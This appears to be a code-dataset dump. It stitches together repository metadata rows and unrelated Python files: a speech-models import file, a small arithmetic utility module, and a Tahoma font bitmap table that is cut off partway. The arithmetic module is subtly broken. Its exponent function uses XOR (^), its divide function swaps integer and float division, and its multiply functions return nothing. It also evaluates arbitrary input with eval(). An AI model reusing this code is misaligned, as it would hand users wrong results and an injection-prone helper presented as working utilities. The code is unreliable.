| 30.703204 | 136 | 0.451749 | 1,304 | 18,207 | 6.204755 | 0.059049 | 0.096898 | 0.13756 | 0.183414 | 0.951304 | 0.94018 | 0.900012 | 0.862934 | 0.846249 | 0.829687 | 0 | 0.020085 | 0.420278 | 18,207 | 592 | 137 | 30.755068 | 0.746471 | 0.010985 | 0 | 0.591549 | 0 | 0.006036 | 0.361253 | 0.138802 | 0 | 0 | 0 | 0 | 0.052314 | 1 | 0.026157 | false | 0 | 0.002012 | 0 | 0.028169 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0f5bbd1dc453fccd676f7c44dcb13e61e629c947 | 121 | py | Python | speech/models/__init__.py | AlexZ0729/speech | 6ac4dbff6340c739a68a3fda0f851fd9850dd678 | [
"Apache-2.0"
] | null | null | null | speech/models/__init__.py | AlexZ0729/speech | 6ac4dbff6340c739a68a3fda0f851fd9850dd678 | [
"Apache-2.0"
] | null | null | null | speech/models/__init__.py | AlexZ0729/speech | 6ac4dbff6340c739a68a3fda0f851fd9850dd678 | [
"Apache-2.0"
] | 1 | 2020-06-08T02:17:10.000Z | 2020-06-08T02:17:10.000Z |
from speech.models.model import Model
from speech.models.seq2seq import Seq2Seq
from speech.models.ctc_model import CTC
| 24.2 | 41 | 0.842975 | 19 | 121 | 5.315789 | 0.368421 | 0.29703 | 0.475248 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018519 | 0.107438 | 121 | 4 | 42 | 30.25 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0f6afece3d6e27e0f2462c6831ed9aff65de36f9 | 2,921 | py | Python | py_everything/maths.py | fossabot/py_everything | 5924505e4d12d524df06ecffbfefa19f55499375 | [
"MIT"
] | null | null | null | py_everything/maths.py | fossabot/py_everything | 5924505e4d12d524df06ecffbfefa19f55499375 | [
"MIT"
] | null | null | null | py_everything/maths.py | fossabot/py_everything | 5924505e4d12d524df06ecffbfefa19f55499375 | [
"MIT"
] | null | null | null |
def add(num1, num2, *args):
sum = num1 + num2
for num in args:
sum += num
return sum
def subtract(num1, num2, *args):
sub = num1 - num2
for num in args:
sub -= num
return sub
def multiply(num1, *args):
product = num1
for num in args:
product = product * num
def divide(num1, num2, type):
if type.lower() == 'int':
int_quotient = num1 / num2
return int_quotient
else:
float_quotient = num1 // num2
return float_quotient
def float_div(num1, num2):
quotient = num1 / num2
return quotient
def int_div(num1, num2):
quotient = num1 // num2
return quotient
def expo(num1, num2):
expo = num1 ^ num2
return expo
def mod(num1, num2):
remain = num1 % num2
return remain
def eval_exp(exp):
solution = eval(exp)
return solution
def avg(listOfNos):
avg = 0
for num in listOfNos:
avg += num
avg = avg / len(listOfNos)
return avg
class MathsBase:
def __init__(self, num1=0, num2=0):
self.num1 = num1
self.num2 = num2
def add(self, num1, num2, *args):
sum = num1 + num2
for num in args:
sum += num
return sum
def subtract(self, num1, num2, *args):
sub = num1 - num2
for num in args:
sub = sub - num
return sub
def multiply(self, num1, *args):
product = num1
for num in args:
product = product * num
def divide(self, num1, num2):
quotient = num1 / num2
return quotient
class MathsAdvanced:
def __init__(self, num1=0, num2=0):
self.num1 = num1
self.num2 = num2
def add(self, num1, num2, *args):
sum = num1 + num2
for num in args:
sum += num
return sum
def subtract(self, num1, num2, *args):
sub = num1 - num2
for num in args:
sub = sub - num
return sub
def multiply(self, num1, *args):
product = num1
for num in args:
product = product * num
def divide(self, num1, num2, type):
if type.lower() == 'int':
int_quotient = num1 / num2
return int_quotient
else:
float_quotient = num1 // num2
return float_quotient
def float_div(self, num1, num2):
quotient = num1 / num2
return quotient
def int_div(self, num1, num2):
quotient = num1 // num2
return quotient
def expo(self, num1, num2):
expo = num1 ^ num2
return expo
def mod(self, num1, num2):
remain = num1 % num2
return remain
def eval_exp(self, exp):
solution = eval(exp)
return solution
def avg(self, listOfNos):
avg = 0
for num in listOfNos:
avg += num
avg = avg / len(listOfNos)
return avg
| 19.473333 | 42 | 0.540568 | 366 | 2,921 | 4.254098 | 0.103825 | 0.184971 | 0.116891 | 0.069364 | 0.965318 | 0.965318 | 0.950546 | 0.950546 | 0.882466 | 0.804753 | 0 | 0.052231 | 0.370763 | 2,921 | 149 | 43 | 19.604027 | 0.794886 | 0 | 0 | 0.807339 | 0 | 0 | 0.002055 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.238532 | false | 0 | 0 | 0 | 0.46789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7e5426b4c2ca291b9940e20ba981ace416055eb1 | 58,162 | py | Python | gaugette/fonts/tahoma_16.py | wsiffer/Google-Bartender | 37018d3efe33a84074a6dccbce9e82f20ef3c923 | [
"MIT"
] | 6 | 2020-07-30T00:21:29.000Z | 2022-03-16T23:31:09.000Z | gaugette/fonts/tahoma_16.py | antndeb/Google-Bartender | 37018d3efe33a84074a6dccbce9e82f20ef3c923 | [
"MIT"
] | null | null | null | gaugette/fonts/tahoma_16.py | antndeb/Google-Bartender | 37018d3efe33a84074a6dccbce9e82f20ef3c923 | [
"MIT"
] | 1 | 2022-03-16T23:39:29.000Z | 2022-03-16T23:39:29.000Z | # coding=utf-8
# Module tahoma_16
# generated from Tahoma 12pt
name = "Tahoma 16"
start_char = '!'
end_char = chr(127)
char_height = 16
space_width = 8
gap_width = 2
bitmaps = (
# @0 '!' (1 pixels wide)
0x00, #
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @16 '"' (4 pixels wide)
0x90, # O O
0x90, # O O
0x90, # O O
0x90, # O O
0x90, # O O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @32 '#' (11 pixels wide)
0x00, 0x00, #
0x08, 0x40, # O O
0x08, 0x40, # O O
0x10, 0x80, # O O
0x7F, 0xE0, # OOOOOOOOOO
0x10, 0x80, # O O
0x10, 0x80, # O O
0x21, 0x00, # O O
0x21, 0x00, # O O
0xFF, 0xC0, # OOOOOOOOOO
0x21, 0x00, # O O
0x42, 0x00, # O O
0x42, 0x00, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @64 '$' (7 pixels wide)
0x00, #
0x10, # O
0x10, # O
0x7C, # OOOOO
0x92, # O O O
0x90, # O O
0x90, # O O
0x70, # OOO
0x1C, # OOO
0x12, # O O
0x12, # O O
0x92, # O O O
0x7C, # OOOOO
0x10, # O
0x10, # O
0x10, # O
# @80 '%' (14 pixels wide)
0x00, 0x00, #
0x78, 0x20, # OOOO O
0x84, 0x40, # O O O
0x84, 0x40, # O O O
0x84, 0x80, # O O O
0x85, 0x00, # O O O
0x85, 0x78, # O O O OOOO
0x7A, 0x84, # OOOO O O O
0x02, 0x84, # O O O
0x04, 0x84, # O O O
0x08, 0x84, # O O O
0x08, 0x84, # O O O
0x10, 0x78, # O OOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @112 '&' (10 pixels wide)
0x00, 0x00, #
0x3C, 0x00, # OOOO
0x42, 0x00, # O O
0x42, 0x00, # O O
0x42, 0x00, # O O
0x24, 0x00, # O O
0x38, 0x80, # OOO O
0x48, 0x80, # O O O
0x84, 0x80, # O O O
0x83, 0x00, # O OO
0x81, 0x00, # O O
0x42, 0x80, # O O O
0x3C, 0x40, # OOOO O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @144 ''' (1 pixels wide)
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @160 '(' (4 pixels wide)
0x10, # O
0x20, # O
0x40, # O
0x40, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x40, # O
0x40, # O
0x20, # O
0x10, # O
# @176 ')' (4 pixels wide)
0x80, # O
0x40, # O
0x20, # O
0x20, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x20, # O
0x20, # O
0x40, # O
0x80, # O
# @192 '*' (7 pixels wide)
0x10, # O
0x92, # O O O
0x54, # O O O
0x38, # OOO
0x54, # O O O
0x92, # O O O
0x10, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @208 '+' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0xFF, 0x80, # OOOOOOOOO
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @240 ',' (2 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x40, # O
0x40, # O
0x40, # O
0x80, # O
0x80, # O
# @256 '-' (5 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0xF8, # OOOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @272 '.' (1 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @288 '/' (6 pixels wide)
0x04, # O
0x04, # O
0x08, # O
0x08, # O
0x08, # O
0x10, # O
0x10, # O
0x10, # O
0x20, # O
0x20, # O
0x20, # O
0x40, # O
0x40, # O
0x40, # O
0x80, # O
0x80, # O
# @304 '0' (8 pixels wide)
0x00, #
0x3C, # OOOO
0x42, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x42, # O O
0x3C, # OOOO
0x00, #
0x00, #
0x00, #
# @320 '1' (5 pixels wide)
0x00, #
0x20, # O
0x20, # O
0xE0, # OOO
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0xF8, # OOOOO
0x00, #
0x00, #
0x00, #
# @336 '2' (7 pixels wide)
0x00, #
0x78, # OOOO
0x84, # O O
0x02, # O
0x02, # O
0x02, # O
0x04, # O
0x08, # O
0x10, # O
0x20, # O
0x40, # O
0x80, # O
0xFE, # OOOOOOO
0x00, #
0x00, #
0x00, #
# @352 '3' (7 pixels wide)
0x00, #
0x78, # OOOO
0x84, # O O
0x02, # O
0x02, # O
0x04, # O
0x38, # OOO
0x04, # O
0x02, # O
0x02, # O
0x02, # O
0x84, # O O
0x78, # OOOO
0x00, #
0x00, #
0x00, #
# @368 '4' (8 pixels wide)
0x00, #
0x02, # O
0x06, # OO
0x0A, # O O
0x12, # O O
0x22, # O O
0x42, # O O
0x82, # O O
0xFF, # OOOOOOOO
0x02, # O
0x02, # O
0x02, # O
0x02, # O
0x00, #
0x00, #
0x00, #
# @384 '5' (7 pixels wide)
0x00, #
0xFE, # OOOOOOO
0x80, # O
0x80, # O
0x80, # O
0xF8, # OOOOO
0x04, # O
0x02, # O
0x02, # O
0x02, # O
0x02, # O
0x84, # O O
0x78, # OOOO
0x00, #
0x00, #
0x00, #
# @400 '6' (8 pixels wide)
0x00, #
0x1E, # OOOO
0x20, # O
0x40, # O
0x80, # O
0xBC, # O OOOO
0xC2, # OO O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x42, # O O
0x3C, # OOOO
0x00, #
0x00, #
0x00, #
# @416 '7' (7 pixels wide)
0x00, #
0xFE, # OOOOOOO
0x02, # O
0x04, # O
0x04, # O
0x08, # O
0x08, # O
0x10, # O
0x10, # O
0x20, # O
0x20, # O
0x40, # O
0x40, # O
0x00, #
0x00, #
0x00, #
# @432 '8' (8 pixels wide)
0x00, #
0x3C, # OOOO
0x42, # O O
0x81, # O O
0x81, # O O
0x42, # O O
0x3C, # OOOO
0x42, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x42, # O O
0x3C, # OOOO
0x00, #
0x00, #
0x00, #
# @448 '9' (8 pixels wide)
0x00, #
0x3C, # OOOO
0x42, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x43, # O OO
0x3D, # OOOO O
0x01, # O
0x02, # O
0x04, # O
0x78, # OOOO
0x00, #
0x00, #
0x00, #
# @464 ':' (1 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @480 ';' (2 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x40, # O
0x40, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x40, # O
0x40, # O
0x40, # O
0x80, # O
0x80, # O
# @496 '<' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x01, # O
0x06, # OO
0x18, # OO
0x60, # OO
0x80, # O
0x60, # OO
0x18, # OO
0x06, # OO
0x01, # O
0x00, #
0x00, #
0x00, #
0x00, #
# @512 '=' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xFF, 0x80, # OOOOOOOOO
0x00, 0x00, #
0x00, 0x00, #
0xFF, 0x80, # OOOOOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @544 '>' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x80, # O
0x60, # OO
0x18, # OO
0x06, # OO
0x01, # O
0x06, # OO
0x18, # OO
0x60, # OO
0x80, # O
0x00, #
0x00, #
0x00, #
0x00, #
# @560 '?' (6 pixels wide)
0x00, #
0x70, # OOO
0x88, # O O
0x04, # O
0x04, # O
0x04, # O
0x08, # O
0x10, # O
0x20, # O
0x20, # O
0x00, #
0x20, # O
0x20, # O
0x00, #
0x00, #
0x00, #
# @576 '@' (13 pixels wide)
0x00, 0x00, #
0x0F, 0x80, # OOOOO
0x30, 0x60, # OO OO
0x40, 0x10, # O O
0x47, 0xD0, # O OOOOO O
0x88, 0x48, # O O O O
0x90, 0x48, # O O O O
0x90, 0x48, # O O O O
0x90, 0x48, # O O O O
0x90, 0x48, # O O O O
0x88, 0xC8, # O O OO O
0x47, 0x70, # O OOO OOO
0x40, 0x00, # O
0x30, 0x00, # OO
0x0F, 0x80, # OOOOO
0x00, 0x00, #
# @608 'A' (10 pixels wide)
0x00, 0x00, #
0x0C, 0x00, # OO
0x12, 0x00, # O O
0x12, 0x00, # O O
0x12, 0x00, # O O
0x21, 0x00, # O O
0x21, 0x00, # O O
0x21, 0x00, # O O
0x7F, 0x80, # OOOOOOOO
0x40, 0x80, # O O
0x40, 0x80, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @640 'B' (8 pixels wide)
0x00, #
0xFC, # OOOOOO
0x82, # O O
0x82, # O O
0x82, # O O
0x84, # O O
0xFC, # OOOOOO
0x82, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x82, # O O
0xFC, # OOOOOO
0x00, #
0x00, #
0x00, #
# @656 'C' (9 pixels wide)
0x00, 0x00, #
0x1F, 0x00, # OOOOO
0x60, 0x80, # OO O
0x40, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x40, 0x00, # O
0x60, 0x80, # OO O
0x1F, 0x00, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @688 'D' (10 pixels wide)
0x00, 0x00, #
0xFC, 0x00, # OOOOOO
0x83, 0x00, # O OO
0x80, 0x80, # O O
0x80, 0x80, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x80, # O O
0x80, 0x80, # O O
0x83, 0x00, # O OO
0xFC, 0x00, # OOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @720 'E' (8 pixels wide)
0x00, #
0xFF, # OOOOOOOO
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0xFF, # OOOOOOOO
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0xFF, # OOOOOOOO
0x00, #
0x00, #
0x00, #
# @736 'F' (7 pixels wide)
0x00, #
0xFE, # OOOOOOO
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0xFE, # OOOOOOO
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @752 'G' (10 pixels wide)
0x00, 0x00, #
0x1F, 0x80, # OOOOOO
0x60, 0x40, # OO O
0x40, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x87, 0xC0, # O OOOOO
0x80, 0x40, # O O
0x80, 0x40, # O O
0x40, 0x40, # O O
0x60, 0x40, # OO O
0x1F, 0x80, # OOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @784 'H' (10 pixels wide)
0x00, 0x00, #
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0xFF, 0xC0, # OOOOOOOOOO
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @816 'I' (3 pixels wide)
0x00, #
0xE0, # OOO
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0xE0, # OOO
0x00, #
0x00, #
0x00, #
# @832 'J' (6 pixels wide)
0x00, #
0x3C, # OOOO
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0xF8, # OOOOO
0x00, #
0x00, #
0x00, #
# @848 'K' (8 pixels wide)
0x00, #
0x81, # O O
0x82, # O O
0x84, # O O
0x88, # O O
0x90, # O O
0xA0, # O O
0xE0, # OOO
0x90, # O O
0x88, # O O
0x84, # O O
0x82, # O O
0x81, # O O
0x00, #
0x00, #
0x00, #
# @864 'L' (7 pixels wide)
0x00, #
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0xFE, # OOOOOOO
0x00, #
0x00, #
0x00, #
# @880 'M' (11 pixels wide)
0x00, 0x00, #
0xC0, 0x60, # OO OO
0xC0, 0x60, # OO OO
0xA0, 0xA0, # O O O O
0xA0, 0xA0, # O O O O
0x91, 0x20, # O O O O
0x91, 0x20, # O O O O
0x8A, 0x20, # O O O O
0x8A, 0x20, # O O O O
0x84, 0x20, # O O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @912 'N' (10 pixels wide)
0x00, 0x00, #
0x80, 0x40, # O O
0xC0, 0x40, # OO O
0xA0, 0x40, # O O O
0x90, 0x40, # O O O
0x90, 0x40, # O O O
0x88, 0x40, # O O O
0x84, 0x40, # O O O
0x82, 0x40, # O O O
0x82, 0x40, # O O O
0x81, 0x40, # O O O
0x80, 0xC0, # O OO
0x80, 0x40, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @944 'O' (11 pixels wide)
0x00, 0x00, #
0x1F, 0x00, # OOOOO
0x60, 0xC0, # OO OO
0x40, 0x40, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x40, 0x40, # O O
0x60, 0xC0, # OO OO
0x1F, 0x00, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @976 'P' (8 pixels wide)
0x00, #
0xFC, # OOOOOO
0x82, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x82, # O O
0xFC, # OOOOOO
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @992 'Q' (11 pixels wide)
0x00, 0x00, #
0x1F, 0x00, # OOOOO
0x60, 0xC0, # OO OO
0x40, 0x40, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x40, 0x40, # O O
0x60, 0xC0, # OO OO
0x1F, 0x00, # OOOOO
0x02, 0x00, # O
0x02, 0x00, # O
0x01, 0xE0, # OOOO
# @1024 'R' (9 pixels wide)
0x00, 0x00, #
0xFC, 0x00, # OOOOOO
0x82, 0x00, # O O
0x82, 0x00, # O O
0x82, 0x00, # O O
0x82, 0x00, # O O
0x84, 0x00, # O O
0xF8, 0x00, # OOOOO
0x88, 0x00, # O O
0x84, 0x00, # O O
0x82, 0x00, # O O
0x81, 0x00, # O O
0x80, 0x80, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1056 'S' (8 pixels wide)
0x00, #
0x3E, # OOOOO
0x41, # O O
0x80, # O
0x80, # O
0x80, # O
0x70, # OOO
0x0E, # OOO
0x01, # O
0x01, # O
0x01, # O
0x82, # O O
0x7C, # OOOOO
0x00, #
0x00, #
0x00, #
# @1072 'T' (9 pixels wide)
0x00, 0x00, #
0xFF, 0x80, # OOOOOOOOO
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1104 'U' (10 pixels wide)
0x00, 0x00, #
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x40, 0x80, # O O
0x3F, 0x00, # OOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1136 'V' (9 pixels wide)
0x00, 0x00, #
0x80, 0x80, # O O
0x80, 0x80, # O O
0x41, 0x00, # O O
0x41, 0x00, # O O
0x41, 0x00, # O O
0x22, 0x00, # O O
0x22, 0x00, # O O
0x22, 0x00, # O O
0x14, 0x00, # O O
0x14, 0x00, # O O
0x14, 0x00, # O O
0x08, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1168 'W' (13 pixels wide)
0x00, 0x00, #
0x82, 0x08, # O O O
0x85, 0x08, # O O O O
0x45, 0x10, # O O O O
0x45, 0x10, # O O O O
0x45, 0x10, # O O O O
0x45, 0x10, # O O O O
0x48, 0x90, # O O O O
0x28, 0xA0, # O O O O
0x28, 0xA0, # O O O O
0x28, 0xA0, # O O O O
0x30, 0x60, # OO OO
0x10, 0x40, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1200 'X' (8 pixels wide)
0x00, #
0x81, # O O
0x42, # O O
0x42, # O O
0x24, # O O
0x18, # OO
0x18, # OO
0x18, # OO
0x18, # OO
0x24, # O O
0x42, # O O
0x42, # O O
0x81, # O O
0x00, #
0x00, #
0x00, #
# @1216 'Y' (9 pixels wide)
0x00, 0x00, #
0x80, 0x80, # O O
0x41, 0x00, # O O
0x41, 0x00, # O O
0x22, 0x00, # O O
0x14, 0x00, # O O
0x14, 0x00, # O O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1248 'Z' (8 pixels wide)
0x00, #
0xFF, # OOOOOOOO
0x01, # O
0x02, # O
0x04, # O
0x04, # O
0x08, # O
0x10, # O
0x20, # O
0x20, # O
0x40, # O
0x80, # O
0xFF, # OOOOOOOO
0x00, #
0x00, #
0x00, #
# @1264 '[' (4 pixels wide)
0xF0, # OOOO
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0xF0, # OOOO
# @1280 '\' (6 pixels wide)
0x80, # O
0x80, # O
0x40, # O
0x40, # O
0x40, # O
0x20, # O
0x20, # O
0x20, # O
0x10, # O
0x10, # O
0x10, # O
0x08, # O
0x08, # O
0x08, # O
0x04, # O
0x04, # O
# @1296 ']' (4 pixels wide)
0xF0, # OOOO
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0xF0, # OOOO
# @1312 '^' (10 pixels wide)
0x00, 0x00, #
0x0C, 0x00, # OO
0x12, 0x00, # O O
0x12, 0x00, # O O
0x21, 0x00, # O O
0x40, 0x80, # O O
0x80, 0x40, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1344 '_' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xFF, 0x80, # OOOOOOOOO
0x00, 0x00, #
# @1376 '`' (2 pixels wide)
0x80, # O
0x80, # O
0x40, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @1392 'a' (7 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x3C, # OOOO
0x42, # O O
0x02, # O
0x3E, # OOOOO
0x42, # O O
0x82, # O O
0x82, # O O
0x86, # O OO
0x7A, # OOOO O
0x00, #
0x00, #
0x00, #
# @1408 'b' (8 pixels wide)
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0xBC, # O OOOO
0xC2, # OO O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x82, # O O
0xFC, # OOOOOO
0x00, #
0x00, #
0x00, #
# @1424 'c' (6 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x38, # OOO
0x44, # O O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x44, # O O
0x38, # OOO
0x00, #
0x00, #
0x00, #
# @1440 'd' (8 pixels wide)
0x01, # O
0x01, # O
0x01, # O
0x01, # O
0x3F, # OOOOOO
0x41, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x43, # O OO
0x3D, # OOOO O
0x00, #
0x00, #
0x00, #
# @1456 'e' (7 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x38, # OOO
0x44, # O O
0x82, # O O
0x82, # O O
0xFE, # OOOOOOO
0x80, # O
0x80, # O
0x42, # O O
0x3C, # OOOO
0x00, #
0x00, #
0x00, #
# @1472 'f' (5 pixels wide)
0x38, # OOO
0x40, # O
0x40, # O
0x40, # O
0xF0, # OOOO
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x00, #
0x00, #
0x00, #
# @1488 'g' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x3F, # OOOOOO
0x41, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x43, # O OO
0x3D, # OOOO O
0x01, # O
0x42, # O O
0x3C, # OOOO
# @1504 'h' (8 pixels wide)
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0xBC, # O OOOO
0xC2, # OO O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x00, #
0x00, #
0x00, #
